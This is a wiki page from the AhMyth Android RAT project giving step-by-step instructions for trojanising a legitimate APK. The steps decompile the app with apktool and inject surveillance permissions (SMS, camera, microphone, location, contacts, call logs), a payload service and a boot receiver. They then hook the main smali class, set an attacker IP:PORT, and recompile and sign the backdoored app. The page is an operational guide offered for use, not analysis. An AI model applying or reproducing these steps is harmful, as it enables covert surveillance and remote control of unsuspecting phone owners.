Skip to content

User Manual ‐ Manually Template Original Applications ‐ Activity Based Method

Jump to bottom
Morsmalleo edited this page Aug 23, 2023 · 30 revisions

Prerequisites

  • Apktool
  • A properly configured, decompiled AhMyth payload
  • Patience


Activity Based Method

  1. Decompile the original application using Apktool.
apktool d original.apk

java -jar apktool.jar d original.apk

  1. Enter the decompiled application folder and open the AndroidManifest.xml file in an editor such as Visual Studio Code or Sublime.

  1. Copy the payload permissions from the "Payload Permissions" dropdown tab below, and inject them with the original application's existing permissions, then save the file. Follow the dropdown "Help" tab to view an example if you get stuck.
Payload Permissions 
<uses-permission android:name="android.permission.WAKE_LOCK"/>
<uses-permission android:name="android.permission.CAMERA"/>
<uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
<uses-permission android:name="android.permission.MANAGE_EXTERNAL_STORAGE"/>
<uses-permission android:name="android.permission.WRITE_SETTINGS"/>
<uses-permission android:name="android.permission.WRITE_SECURE_SETTINGS"/>
<uses-permission android:name="android.permission.INTERNET"/>
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
<uses-permission android:name="android.permission.READ_SMS"/>
<uses-permission android:name="android.permission.SEND_SMS"/>
<uses-permission android:name="android.permission.RECEIVE_SMS"/>
<uses-permission android:name="android.permission.WRITE_SMS"/>
<uses-feature android:name="android.hardware.camera"/>
<uses-feature android:name="android.hardware.camera.autofocus"/>
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
<uses-permission android:name="android.permission.READ_PHONE_STATE"/>
<uses-permission android:name="android.permission.READ_CALL_LOG"/>
<uses-permission android:name="android.permission.PROCESS_OUTGOING_CALLS"/>
<uses-permission android:name="android.permission.READ_CONTACTS"/>
<uses-permission android:name="android.permission.RECORD_AUDIO"/>
<uses-permission android:name="android.permission.MODIFY_AUDIO_SETTINGS"/>
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
<uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
<uses-permission android:name="android.permission.ACCESS_BACKGROUND_LOCATION"/>
<uses-permission android:name="android.permission.INSTALL_PACKAGE"/>

ℹ️ Help

Original Manifest Before Payload Permissions Injection

Permissions Injection - Before


Original Manifest After Payload Permissions Injection

The Injected Payload Permissions are Highlighted in Red 🔴

Permissions Injection - After

  1. Copy the payload Service below, and inject it with the applications existing services, if there are no existing services in the original application's manifest then inject it before the closing </application> tag in the original application's manifest, then save the file. Follow the dropdown "Help" example for further help.
<service android:enabled="true" android:exported="false" android:name="ahmyth.mine.king.ahmyth.MainService"/>
ℹ️ Help

If the manifest contains existing services, then we're going to need to insert the payload service just after the original application's last existing service in the manifest like so:

Original Manifest With Existing Services, Before Payload Service Injection

Service Injection - Application Tag - Before


Original Manifest With Existing Services, After Payload Injection

The Injected Payload Service is highlighted in Red 🔴 while the application's last existing Service is highlighted in Blue 🔵


If the manifest does not contain any existing services, then insert the payload service just before the closing </application> tag in the manifest like so:

Original Manifest Without Existing Services, Before Payload Service Injection

Service Injection - Application Tag - Before


Original Manifest Without Existing Services, After Payload Service Injection

The Injected Payload Service is Highlighted in Red 🔴 while the application's closing </application> tag is highlighted in Blue 🔵

Service Injection - Application Tag- After

  1. Copy the payload Receiver below, and inject it with the applications existing services, if there are no existing services in the original application's manifest then inject it both before the closing </application> tag but after the previously injected payload receiver, then save the file. Follow the dropdown "Help" example for further help.
<receiver android:enabled="true" android:exported="true" android:name="ahmyth.mine.king.ahmyth.MyReceiver">
    <intent-filter>
        <action android:name="android.intent.action.BOOT_COMPLETED"/>
    </intent-filter>
</receiver>
ℹ️ Help

If the original application's manifest contains existing receivers, then insert the payload receiver just after the application's last existing receiver like so:

Original Manifest With Existing Receivers, Before Payload Receiver Injection

Receiver Injection - Application Tag - Before


Original Manifest With Existing Receivers, After Payload Receiver Injection

The Injected Payload Receiver is highlighted in Red 🔴 while the application's last existing receiver tag is highlighted in Blue 🔵 along with the previously injected payload Service which is highlighted in Green 🟢


If the manifest does not contain any existing receivers, then insert the payload receiver just before the closing </application> tag in the manifest like so:

Original Manifest Without Existing Receivers, Before Payload Receiver Injection

Receiver Injection - Application Tag - Before


Original Manifest Without Existing Receivers, After Payload Receiver Injection

The Injected Payload Receiver is highlighted in Red 🔴 while the closing </application> tag is highlighted in Blue 🔵 along with the previously injected payload Service which is highlighted in Green 🟢

Receiver Injection - Application Tag - After

  1. Locate the name of a suitable class for hook injection, you have three options when doing this, you can:
Option A

Search the manifest for the application's Main Application Class Name .

When searching for the Main Application Class Name you'll want to locate the <application> tag within in the manifest contents, it's usually just below where the application's permissions are declared.

Once you have located this tag, you'll then want to look for the android:name= attribute, this will contain the application's Main Application Class name as well as it's path.

  • NOTE: If the android:name attribute in the <application> tag contains "android.app.Application" as it's class name and path, then skip this option and move on to option B.


Option B

If Option A proves unsuitable, then you can search the manifest for the application's Main Launcher Activity class Name .

When searching for the application's Main Launcher Activity Class Name , look for the first occurrence of the <activity> tag that includes <intent-filter> </intent-filter> elements with the attributes android.intent.action.MAIN and android.intent.category.LAUNCHER located between them, (These intent-filters indicate that the activity is the main entry point of the application).

Once you locate the first occurrence of the <activity> tag, that contains the appropriate elements and attributes explained before, you'll want to search for the android:name= attribute which holds the name of the Main Launcher Activity Class as well as it's path .

  • NOTE: If the android:name= attribute within the appropriate <activity> tag contains "android.app.Activity" as its class name and path, then skip this option and proceed to option C, as this doesn't point to a physical file.


Option C

If both Options A and Option B prove unsuitable, then you can search the activity aliases in the manifest for the a hookable class.

When doing this you'll want to start off by locating the first <activity-alias> tag, once you've done this you'll then want to locate the android:targetActivity= attribute within it, one of these will point to a physical file.

  • NOTE: Keep in mind that Option C may prove to be quite time consuming for some applications, specifically large ones like Social Media apps, because the main class name and path output you get from either one of the Options in this Step is further utilised in Step 7 when we start locating the *.smali file the manifest class name and path we extracted points to, but unfortunately there is not much you can do about that, so if you end up on Option C, then continue to perform Option C with Step 7 until you locate a physical *.smali file.

  • Click the dropdown "Help" tab for further information and help.
ℹ️ Help

  • A: Main application class name extraction:

  • Picture Here

  • B: Main launcher activity class name extraction:

  • Picture Here

  • C: Main launcher activity class name extraction from an <activity-alias>:

  • Picture Here

  1. After you have extracted the name of a suitable Main Class from the manifest, you'll want to go ahead and open PowerShell if you're on Windows, or the Terminal if you're on Linux or macOS, and paste the appropriate command in order to quickly locate the correct *.smali file we need to inject our hook into, make sure to replace path/to/original with the path to the original APK you are backdooring, and Class-Name-Here.smali with the class name you extracted from the manifest.
  • Windows
set-location "path/to/original"; gci -recurse -filter "Class-Name-Here.smali" -file | resolve-path -relative
  • Linux & macOS
cd path/to/original; find -name "Class-Name-Here.smali"

  1. Once you have located the application's main class Smali file, we can proceed to open the file in text editor.

  1. Now we need to insert our Payload Hook so we can allow our payload to start once the original application starts, click the dropdown Help tab to see how, MAKE SURE YOU READ THIS PART, MANUAL BINDING WITH AHMYTH HAS CHANGED MASSIVELY SINCE RELEASE OF v1.0-BETA.4.
ℹ️ Help
    1. Locate the 1st occurrence of the string return-void (Highlighted in Blue);
Hook Point


    1. Copy the new Static Payload Hook below. 
invoke-static {}, Lahmyth/mine/king/ahmyth/MainService;->start()V


    1. Inject the new Static Payload Hook (Highlighted in Red) just before the 1st occurrence of the string return-void (Highlighted in Blue), then save the file.
Hook Injection

  1. Head into the Decompiled APK folder of your AhMyth Payload and enter the smali directory.

  1. Copy the payload folders inside the smali directory, excluding the android and androidx folders, these will be copied over later on.

  1. Head back into the decompiled original application we're backdooring, and create a new smali_classes(X) directory (where "(X)" refers to the directory's respective numbering), click to the dropdown tab below to see more information about creating smali_classes(X) directories appropriately.
ℹ️ Creating "smali_classes(X)" Directories Appropriately

Creating smali_classes(X) directories isn't as hard as it sounds.

If the decompiled original application contains only one smali directory, then this directory will always be titled "smali", in which case all we need to do is create a new "smali_classes2" directory and paste our copied AhMyth payload folders in the newly created "smali_classes2" directory.

Before

before


After

after



If the decompiled original application contains multiple smali directories, then that means that we have a list of smali_classes(X) folders on our hands, you'll notice these directories are numbered as well.

So in order to create our new payload directory, all we need to do is following the numbering of the directories, which simply means that we create a smali_classes(X) folder based on the numbering of the last existing smali_classes(X) folder, so for example if this last existing smali_classes(X) folder is numbered as smali_classes10, then we simply create the directory smali_classes11 and so on, the new directory's numbering should always be 1 more than the last existing smali_classes(X) folder.

Before

After

  1. Paste the copied AhMyth payload folders into the newly created smali_classes(X) directory.

  1. Head back into the smali folder of your decompiled AhMyth Payload, and copy the android & androidx folders.

  1. Paste the copied android & androidx folders, into the smali folder of the Decompiled original application and replace files if prompted.

  1. After copying and pasting the android and androidx folders over to the smali directory in the Decompiled original application, you'll want to then edit IP:PORT file titled e.smali which is located at smali_classesX/ahmyth/mine/king/ahmyth (where smali_classesX corresponds to the payload directory we created for storing AhMyth payload files previously) and apply your own IP address and Port number, once you've done this, save the file.

  1. Close everything (make sure all modifications have been saved) and recompile the Backdoored application using apktool.
apktool b original -o Ahmyth.apk

java -jar apktool.jar b original -o Ahmyth.apk

  1. Sign the backdoored application using an APK signer. We recommend Uber APK Signer as it not only signs the payload, but also takes care of zipaligning the payload before signing it as well.
java -jar sign.jar -a path/to/Ahmyth.apk -o ~/path/to/output/folder

java -jar sign.jar -a path/to/folder/containing/the/payload

Information

Source Code Setup

Binary Setup

Clone this wiki locally